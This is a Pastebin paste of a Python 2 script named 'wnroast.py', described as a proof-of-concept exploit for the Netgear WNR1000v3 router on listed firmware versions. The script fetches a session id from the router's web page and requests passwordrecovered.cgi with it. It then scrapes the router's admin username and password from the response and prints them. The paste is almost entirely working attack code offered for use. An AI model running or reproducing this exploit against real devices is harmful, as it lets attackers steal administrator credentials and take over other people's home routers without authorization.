API tools faq
paste
Advertisement
Guest User

wnroast.py

a guest
Jun 15th, 2014
2,468
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.47 KB | None | 0 0
raw download clone embed print report
  1. ######################################################################################
  2. # WNRoast Version 1.0 #
  3. # Netgear WNR1000v3 Credential Harvesting Exploit (Proof of Concept) #
  4. # Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA #
  5. # By: c1ph04 #
  6. # #
  7. # Not the prettiest, but I need to get this done before the baby wakes up #
  8. ######################################################################################
  9.  
  10. import socket
  11. import urllib
  12. import urllib2
  13. import sys
  14.  
  15. CRLF = "\r\n"
  16.  
  17. request = [
  18. "GET / HTTP/1.1",
  19. "Host: none",
  20. "Connection: Close",
  21. "",
  22. "",
  23. ]
  24. #---------------------------------------------------
  25.  
  26. s = socket.socket()
  27. s.connect((sys.argv[1], int(sys.argv[2])))
  28.  
  29. s.send(CRLF.join(request))
  30.  
  31. response = ''
  32. buffer = s.recv(4096)
  33. while buffer:
  34. response += buffer
  35. buffer = s.recv(4096)
  36.  
  37. header_data, _, body = response.partition(CRLF + CRLF)
  38.  
  39. #-----------------------------------------------------
  40.  
  41. def extract_between(text, sub1, sub2, nth=1):
  42.  
  43. if sub2 not in text.split(sub1, nth)[-1]:
  44. return None
  45. return text.split(sub1, nth)[-1].split(sub2, nth)[0]
  46.  
  47. text = body
  48.  
  49. uid = (repr(extract_between(text, 'id=', '\"')))
  50.  
  51. uid = uid.replace("\'", '')
  52.  
  53. #-----------------------------------------------------
  54.  
  55. # Send POST To Get Credentials
  56.  
  57. ip = sys.argv[1]
  58.  
  59. ip = ip.replace("\'", '')
  60.  
  61. port = sys.argv[2]
  62.  
  63. port = port.replace("\'", '')
  64.  
  65. url = 'http://' + ip + ':' + port + '/passwordrecovered.cgi?id=' + uid
  66.  
  67. data = ''
  68. req = urllib2.Request(url, data)
  69. response = urllib2.urlopen(req)
  70. the_page = response.read()
  71.  
  72. #-------------------------------------------------------
  73.  
  74. username = (repr(extract_between(the_page, 'Router Admin Username</td>', '</td>')))
  75. username = (repr(extract_between(username, '>', '\'')))
  76. username = username.replace("\'", '')
  77.  
  78. password = (repr(extract_between(the_page, 'Router Admin Password</td>', '</td>')))
  79. password = (repr(extract_between(password, '>', '\'')))
  80. password = password.replace("\'", '')
  81.  
  82. print """
  83.  
  84. WNRoast Version 1.0
  85. =========================
  86. By: c1ph04
  87.  
  88. """
  89. print "\n WNRoasted!\n"
  90. print " Username is: " + username + '\n'
  91. print " Password is: " + password
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!